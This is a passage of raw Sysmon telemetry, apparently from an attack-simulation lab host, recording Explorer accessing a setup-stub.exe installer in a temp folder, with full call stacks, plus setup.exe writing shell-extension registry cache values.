storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 13241300x800000000000000016500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.896{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x800000000000000016499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.817{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFFBinary Data 10341000x800000000000000016498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 